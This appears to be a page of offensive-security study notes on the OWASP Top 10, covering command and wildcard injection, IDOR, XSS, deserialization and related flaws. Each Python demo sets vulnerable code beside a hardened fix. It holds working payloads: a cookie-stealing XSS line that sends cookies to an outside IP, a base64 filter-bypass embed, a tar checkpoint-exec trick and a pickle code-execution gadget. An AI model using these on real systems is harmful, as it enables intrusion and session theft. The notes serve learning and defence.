Offensive Security Notes

OWASP TOP 10 (2017)

https://cheatsheetseries.owasp.org/IndexTopTen.html


Last updated 3 years ago

Injection

Command Injection

Blind injection: the injected command runs, but its output is not returned in the response. Confirm it indirectly, with a time delay (sleep 5), a callback to a host you control (ping, curl or nslookup to your IP), or a file written somewhere you can read afterwards.

Active injection: the output of the injected command is returned in the response, so you see the result directly.

Example: evilshell.php?commandString=cat /etc/passwd
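The two cases above, as an added example that is not part of the original notes: a handler in the style of the page's evilshell.php that concatenates a parameter into a shell command, its argv-list replacement, and the two checks a tester runs against each (the greeting feature, the marker string and the payloads are constructed for this demo).

```python
import subprocess
import time

# Added example, not part of the original notes. It stands in for the page's
# evilshell.php: a handler that builds a shell command from a user-supplied
# parameter. The 'greeting' feature, marker and payloads are constructed.

def vulnerable_handler(name: str) -> str:
    """Concatenates user input into a command line and hands it to /bin/sh."""
    # shell=True means ';', '|', '&&', '$(...)' and backticks in `name`
    # are interpreted by the shell, so a second command can be appended.
    result = subprocess.run("echo Hello " + name, shell=True,
                            capture_output=True, text=True)
    return result.stdout

def hardened_handler(name: str) -> str:
    """Same feature without a shell: argv list, so metacharacters stay data."""
    result = subprocess.run(["echo", "Hello", name],
                            capture_output=True, text=True)
    return result.stdout

def active_injection_check(handler) -> bool:
    """Active injection: the injected command's output comes back in the
    response. Append a command that prints a marker and look for the marker
    on a line of its own (the hardened handler echoes it only as part of
    'Hello x; echo ...', so it never appears alone)."""
    marker = "INJ3CTED"
    out = handler(f"x; echo {marker}")
    return any(line.strip() == marker for line in out.splitlines())

def blind_injection_check(handler, delay: int = 1) -> bool:
    """Blind injection: nothing is reflected, so time the response. A sleep
    payload that delays the reply by `delay` seconds proves execution."""
    start = time.monotonic()
    handler(f"x; sleep {delay}")
    return time.monotonic() - start >= delay * 0.9

if __name__ == "__main__":
    for h in (vulnerable_handler, hardened_handler):
        print(h.__name__, "active:", active_injection_check(h),
              "blind:", blind_injection_check(h))
```

The time-based check is the same idea as a blind SQL injection sleep: you are measuring the delta between a normal and a delayed response, so run it more than once on a noisy network before calling it confirmed.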

Wildcard Injection

When an elevated program (a root cron job, a SUID binary, a sudo-allowed script) runs a command with a shell wildcard such as * in a directory you can write to, the shell expands the wildcard into every file name in that directory before the command runs. File names that look like options (for example starting with --) are then passed to the program as arguments, so by creating such files you can complete a valid command for that program through the wildcard expansion. More info on this page specific to wildcard injection.
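The well-known GNU tar form of this, as an added example that is not part of the original notes: a "backup" job that runs tar cf ... * in a directory the attacker controls, where two files named like tar's --checkpoint options make tar execute a planted shell script. The directory, file names and script body are constructed for the demo; the argv expansion is shown independently of whether GNU tar is installed.

```python
import os
import shlex
import shutil
import subprocess
import tempfile

# Added example, not part of the original notes. Demonstrates the well-known
# GNU tar case: a privileged job runs `tar cf backup.tar *` in a directory an
# attacker can write to. File names and the payload script are constructed.

ATTACKER_FILES = {
    "shell.sh": "touch pwned.marker\n",          # what tar will end up running
    "--checkpoint=1": "",                        # file name tar reads as an option
    "--checkpoint-action=exec=sh shell.sh": "",  # ...and the action for it
    "report.txt": "legitimate data\n",           # a normal file for contrast
}

def setup_demo_dir() -> str:
    """Create the writable directory with the attacker's files in it."""
    directory = tempfile.mkdtemp(prefix="wildcard-")
    for name, content in ATTACKER_FILES.items():
        with open(os.path.join(directory, name), "w") as f:
            f.write(content)
    return directory

def expanded_argv(directory: str) -> list:
    """What `*` becomes: every non-dot entry, in the order /bin/sh in the C
    locale would produce (bytewise, so '-' sorts before letters and the
    option-looking names come first)."""
    names = [n for n in os.listdir(directory) if not n.startswith(".")]
    return sorted(names, key=lambda s: s.encode())

def run_tar_demo(directory: str):
    """Run the backup the way a root cron job would. Returns True if the
    planted shell.sh ran, False if it did not (e.g. non-GNU tar), None if
    no tar binary is available."""
    if shutil.which("tar") is None:
        return None
    archive = os.path.join(tempfile.mkdtemp(prefix="wildcard-out-"), "backup.tar")
    # The unquoted * is the bug: the shell, not tar, expands it.
    subprocess.run(f"tar cf {shlex.quote(archive)} *", shell=True,
                   cwd=directory, capture_output=True)
    return os.path.exists(os.path.join(directory, "pwned.marker"))

if __name__ == "__main__":
    d = setup_demo_dir()
    print("argv tar receives:", expanded_argv(d))
    print("shell.sh executed:", run_tar_demo(d))
```

Because the checkpoint files sort ahead of the real files, tar parses them as options before it ever looks at the data; the same trick applies to any program whose options can be spelled as file names (rsync, chown with --reference, and so on). The fix on the defender's side is `tar cf backup.tar -- *` or, better, `./*`, so every expansion starts with a character that can't be an option.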

Broken Authentication

  • Brute Force Attacks

  • Weak Credentials

  • Weak Session Cookies (predictable values, no signature, no expiry)

Sometimes you can even re-register an existing account and get its privileges by registering a username such as " admin" (with a space at the beginning): the existing-account check compares the raw string, so " admin" counts as new, but the application trims the name when it loads the profile and hands you the real admin's data.
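The " admin" re-registration bug as an added example that is not part of the original notes, beside the fix (normalize once, the same way, everywhere). The accounts, passwords and profile data are constructed; the hardened version also goes beyond the note by folding case and Unicode compatibility forms, so "Admin" and a fullwidth "ａｄｍｉｎ" collide with "admin" as well.

```python
import unicodedata

# Added example, not part of the original notes. Models the registration bug
# the note describes: the app checks for an existing account with an exact
# string match but strips whitespace when it loads the profile. Users,
# passwords and profile data are constructed for this demo.

class VulnerableSite:
    def __init__(self):
        self.accounts = {"admin": "s3cret-admin-pw"}           # username -> password
        self.profiles = {"admin": "flag{admin-private-data}"}  # username -> data

    def register(self, username, password):
        if username in self.accounts:     # exact match: " admin" != "admin"
            return False
        self.accounts[username] = password
        self.profiles[username] = "new user, nothing here"
        return True

    def login_and_view_profile(self, username, password):
        if self.accounts.get(username) != password:
            return None
        # The profile lookup "helpfully" trims the name, so a session for
        # " admin" reads the real admin's profile.
        return self.profiles.get(username.strip())

def canonical(username: str) -> str:
    """One normalization applied at every lookup: NFKC, trim, case-fold."""
    return unicodedata.normalize("NFKC", username).strip().casefold()

class HardenedSite(VulnerableSite):
    def register(self, username, password):
        key = canonical(username)
        if key in self.accounts:          # collision on the canonical form
            return False
        return super().register(key, password)

    def login_and_view_profile(self, username, password):
        key = canonical(username)
        if self.accounts.get(key) != password:
            return None
        return self.profiles.get(key)

if __name__ == "__main__":
    v = VulnerableSite()
    v.register(" admin", "attacker")
    print("vulnerable:", v.login_and_view_profile(" admin", "attacker"))
    h = HardenedSite()
    print("hardened register ' admin':", h.register(" admin", "attacker"))
```

The general rule: whatever key you use to decide "does this account exist" must be the same key you use to load data for it; any difference between the two is a takeover path.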

Sensitive Data Exposure

Sensitive data such as usernames or passwords left in HTML comments, or flat-file databases (for example a .db or .sql file under the web root) that can be downloaded in whole. Check the page source, and try directory listing and common backup file names.

XML External Entity

Broken Access Control

IDOR (Insecure Direct Object Reference) is a common way to test for broken access control. If changing an identifier on the client side (a query parameter, a path segment, a hidden form field) returns another user's data, the application is using the supplied reference directly without checking that the logged-in user is authorised to access that object.

note.php?note=1 shows your note
note.php?note=0 shows somebody else's note
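The note.php?note=N case as an added example that is not part of the original notes: the handler that trusts the client-supplied id, the one that checks ownership against the server-side session, and the sweep a tester runs to see which ids leak. Users, notes and ids are constructed for this demo.

```python
# Added example, not part of the original notes. Models note.php?note=N: a
# handler that trusts the client-supplied note id, beside one that checks
# ownership. Users, notes and ids are constructed for this demo.

NOTES = {                      # note id -> (owner, body)
    0: ("alice", "alice's private note"),
    1: ("bob", "bob's shopping list"),
    2: ("carol", "carol's API token: tok_example"),
}

NOT_FOUND = "404 Not Found"

def vulnerable_note_view(session_user: str, note_id: int):
    """note.php?note=<id>: returns whatever id the client asks for."""
    note = NOTES.get(note_id)
    return NOT_FOUND if note is None else note[1]

def hardened_note_view(session_user: str, note_id: int):
    """Authorize against the server-side session, not the request parameter.
    Missing and foreign ids get the same answer so the endpoint does not
    confirm which ids exist."""
    note = NOTES.get(note_id)
    if note is None or note[0] != session_user:
        return NOT_FOUND
    return note[1]

def idor_sweep(handler, session_user: str, id_range) -> dict:
    """The tester's check: request every id in range as one user and collect
    the bodies that belong to somebody else."""
    leaked = {}
    for note_id in id_range:
        body = handler(session_user, note_id)
        owner = NOTES.get(note_id, (None,))[0]
        if body != NOT_FOUND and owner != session_user:
            leaked[note_id] = body
    return leaked

if __name__ == "__main__":
    print("vulnerable leaks:", idor_sweep(vulnerable_note_view, "bob", range(0, 4)))
    print("hardened leaks:", idor_sweep(hardened_note_view, "bob", range(0, 4)))
```

On a real target you do the sweep with two accounts you own (Burp's Autorize or a short script doing the same), so you can prove the access control failure without touching other customers' data.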

Security Misconfiguration

  • Poorly configured permissions on cloud services, like S3 buckets

  • Having unnecessary features enabled, like services, pages, accounts or privileges

  • Default accounts with unchanged passwords (most common)

  • Error messages that are overly detailed and allow an attacker to find out more about the system

Cross-site Scripting (XSS)

  • Stored XSS - the most dangerous type of XSS. The malicious string originates from the website's own database: the site stored user input without sanitising it (removing or encoding the dangerous parts) and later renders it to every visitor of that page. Cookie-stealing payloads like the first one below only work when the session cookie is not marked HttpOnly.

    • <img src=x onerror="this.src='http://10.6.104.9/collect.gif?'+document.cookie; this.removeAttribute('onerror');">

    • <img src=x onerror=alert('XSS');>

  • Reflected XSS - the malicious payload is part of the victim's request to the website, and the website includes it in the response to that same user. The attacker therefore needs to trick the victim into opening a crafted URL to execute the payload.

    1. reflected?keyword=<script>alert("Hello")</script>

    2. reflected?keyword=<script>alert(window.location.hostname)</script>

  • DOM-Based XSS - DOM stands for Document Object Model, the programming interface for HTML and XML documents that represents the page so that scripts can change its structure, style and content. DOM-based XSS happens when client-side JavaScript takes attacker-controlled data (for example from location.hash, which is never sent to the server) and writes it into the page without sanitising it, so the payload runs without the server ever seeing it.

    1. <script>document.getElementById("thm-title").textContent="I am able to change the title";</script>

    2. http://10.10.33.108/dom#img-url=test" onmouseover="alert(document.cookie)"
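The reflected and attribute-injection cases above on the server side, as an added example that is not part of the original notes: the same keyword parameter rendered raw, body-escaped, and into an attribute with and without quote encoding. It goes one step beyond the notes by showing that one encoder is not enough for every HTML context, and it parses the output to prove which tags and attributes the browser would actually see. Templates and the check are constructed for the demo; the payloads are the ones in the notes.

```python
import html
from html.parser import HTMLParser

# Added example, not part of the original notes. A reflected endpoint like
# reflected?keyword=... rendered four ways. The templates are constructed;
# the payloads are the ones quoted in the notes.

PAYLOAD_SCRIPT = '<script>alert("Hello")</script>'
PAYLOAD_ATTR = 'test" onmouseover="alert(document.cookie)'

def render_vulnerable(keyword: str) -> str:
    """Raw concatenation into the HTML body: reflected XSS."""
    return f"<p>Results for {keyword}</p>"

def render_body_escaped(keyword: str) -> str:
    """Entity-encode <, > and & (enough for the body text context)."""
    return f"<p>Results for {html.escape(keyword, quote=False)}</p>"

def render_attr_unquoted_escape(keyword: str) -> str:
    """The same encoder reused inside an attribute. quote=False leaves the
    double quote alone, so the value can close the attribute and add an
    event handler, which is exactly the dom#img-url= payload above."""
    return f'<img src="{html.escape(keyword, quote=False)}">'

def render_attr_escaped(keyword: str) -> str:
    """Attribute context: quotes must be encoded too (html.escape default)."""
    return f'<img src="{html.escape(keyword)}">'

class TagCollector(HTMLParser):
    """Records every start tag and its attribute names, i.e. what the browser
    would build from the markup."""
    def __init__(self):
        super().__init__()
        self.tags = []
    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, [name for name, _ in attrs]))

def parsed_tags(markup: str) -> list:
    collector = TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags

if __name__ == "__main__":
    for render, payload in ((render_vulnerable, PAYLOAD_SCRIPT),
                            (render_body_escaped, PAYLOAD_SCRIPT),
                            (render_attr_unquoted_escape, PAYLOAD_ATTR),
                            (render_attr_escaped, PAYLOAD_ATTR)):
        print(render.__name__, "->", parsed_tags(render(payload)))
```

Output encoding has to match the context the value lands in (body, attribute, URL, JavaScript string); a template engine with auto-escaping picks the right one for you, hand-built f-strings like these do not.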

Bypass XSS Filters

The <embed> below carries an SVG as a base64 data: URI, so a filter that looks for <script> or on*= in the raw input never sees the script the browser runs after decoding (the decoded SVG contains <script type="text/ecmascript">alert("XSS");</script>).

<embed src="data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAwIiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="></embed>
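Why the payload gets through, as an added example that is not part of the original notes: a constructed stand-in for a typical blocklist filter that passes the <embed>, a decoder that reveals the <script> inside the data: URI the way the browser will, and the same filter re-applied to the decoded content. The blocklist pattern is constructed; the embed is the payload above.

```python
import base64
import re

# Added example, not part of the original notes. Shows why the <embed> payload
# gets past a blocklist: the script lives inside a base64 data: URI, so a
# filter looking for "<script" in the request never sees it. The blocklist
# itself is a constructed stand-in for a typical naive WAF rule.

EMBED_PAYLOAD = (
    '<embed src="data:image/svg+xml;base64,'
    'PHN2ZyB4bWxuczpzdmc9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDov'
    'L3d3dy53My5vcmcvMjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5'
    'L3hsaW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw'
    'IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlhTUyIpOzwv'
    'c2NyaXB0Pjwvc3ZnPg=="></embed>'
)

BLOCKLIST = re.compile(r"<script|javascript:|onerror=", re.IGNORECASE)

def naive_filter_allows(value: str) -> bool:
    """Typical blocklist rule: reject if a known-bad token appears verbatim."""
    return BLOCKLIST.search(value) is None

def decode_data_uris(markup: str) -> list:
    """Decode every base64 data: URI in the markup, as the browser will."""
    decoded = []
    for m in re.finditer(r"data:[\w/+.-]+;base64,([A-Za-z0-9+/=\s]+)", markup):
        raw = base64.b64decode(re.sub(r"\s+", "", m.group(1)))
        decoded.append(raw.decode("utf-8", errors="replace"))
    return decoded

def filter_with_decoding_allows(value: str) -> bool:
    """Apply the same blocklist to the decoded embedded documents too."""
    if not naive_filter_allows(value):
        return False
    return all(naive_filter_allows(inner) for inner in decode_data_uris(value))

if __name__ == "__main__":
    print("naive filter allows embed:", naive_filter_allows(EMBED_PAYLOAD))
    print("decoded:", decode_data_uris(EMBED_PAYLOAD)[0])
    print("decoding filter allows embed:", filter_with_decoding_allows(EMBED_PAYLOAD))
```

Decoding one layer is still a blocklist and still loses to the next encoding (URL-encoding, HTML entities, UTF-7, split tokens); the durable fix is context-aware output encoding plus a Content-Security-Policy, with the filter kept only as a tripwire.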

Insecure Deserialization

The server deserializes user-supplied data (a cookie, a hidden field, a request body) without validating it. Because deserialization reconstructs objects, not just values, modifying the serialized data can change a stored role to give you admin access, or supply an object (a "gadget") that executes a command when it is reconstructed, for example to spawn a reverse shell.
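Both outcomes above as an added example that is not part of the original notes, with Python's pickle standing in for whatever serializer the target uses: a cookie whose unpickling runs a command, then a session cookie built from a data-only format with an integrity tag so neither objects nor a changed role field can be smuggled in. The cookie layout, key, user data and gadget command are constructed for this demo.

```python
import base64
import hashlib
import hmac
import json
import pickle
import subprocess

# Added example, not part of the original notes. pickle stands in for whatever
# serializer the target uses; cookie layout, key and user data are constructed.

def vulnerable_load_session(cookie: str):
    """Server trusts a client-supplied pickle: unpickling executes code."""
    return pickle.loads(base64.b64decode(cookie))

class Gadget:
    """Attacker-built object. pickle stores __reduce__'s (callable, args), and
    the server calls it on load. A real payload would run a reverse shell;
    here it runs `echo pwned` so the effect is observable."""
    def __reduce__(self):
        return (subprocess.check_output, (["echo", "pwned"],))

def forge_cookie() -> str:
    return base64.b64encode(pickle.dumps(Gadget())).decode()

# Hardened: a data-only format (JSON) plus an HMAC, so the client can neither
# inject objects nor change the role field without the server key.
SECRET_KEY = b"constructed-demo-key-do-not-reuse"

def _tag(body: bytes) -> str:
    return hmac.new(SECRET_KEY, body, hashlib.sha256).hexdigest()

def issue_session(user: str, role: str) -> str:
    body = json.dumps({"user": user, "role": role}, separators=(",", ":")).encode()
    return base64.b64encode(body).decode() + "." + _tag(body)

def hardened_load_session(cookie: str):
    """Verify the tag before parsing; reject anything malformed or altered."""
    try:
        b64, tag = cookie.split(".", 1)
        body = base64.b64decode(b64)
    except ValueError:
        return None
    if not hmac.compare_digest(_tag(body), tag):
        return None
    return json.loads(body)

def tamper_role(cookie: str, new_role: str) -> str:
    """The privilege-escalation attempt: edit the role, keep the old tag."""
    b64, tag = cookie.split(".", 1)
    data = json.loads(base64.b64decode(b64))
    data["role"] = new_role
    body = json.dumps(data, separators=(",", ":")).encode()
    return base64.b64encode(body).decode() + "." + tag

if __name__ == "__main__":
    print("vulnerable:", vulnerable_load_session(forge_cookie()))
    c = issue_session("alice", "user")
    print("hardened, genuine:", hardened_load_session(c))
    print("hardened, tampered:", hardened_load_session(tamper_role(c, "admin")))
```

During a test, a cookie that base64-decodes to a serialized object (Python pickle starts with 0x80, Java with AC ED 00 05, PHP with a:/O:) is the signal to try this; an HMAC-tagged blob like the hardened one is not worth editing without the key.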

Components with Known Vulnerabilities

Running software with publicly known vulnerabilities. Well-known applications and versions often have ready-made exploits on places such as exploit-db.com (or locally via searchsploit), so fingerprint versions from banners, headers and page source and look them up.

Insufficient Logging & Monitoring

Other notes

XML External Entity: insecure handling of XML payloads can give you Local File Inclusion (LFI). Example on the XXE page.

Security Misconfiguration: not using HTTP security headers, or revealing too much detail (product and version) in the Server: HTTP header.

XSS payload collection: https://github.com/ihebski/XSS-Payloads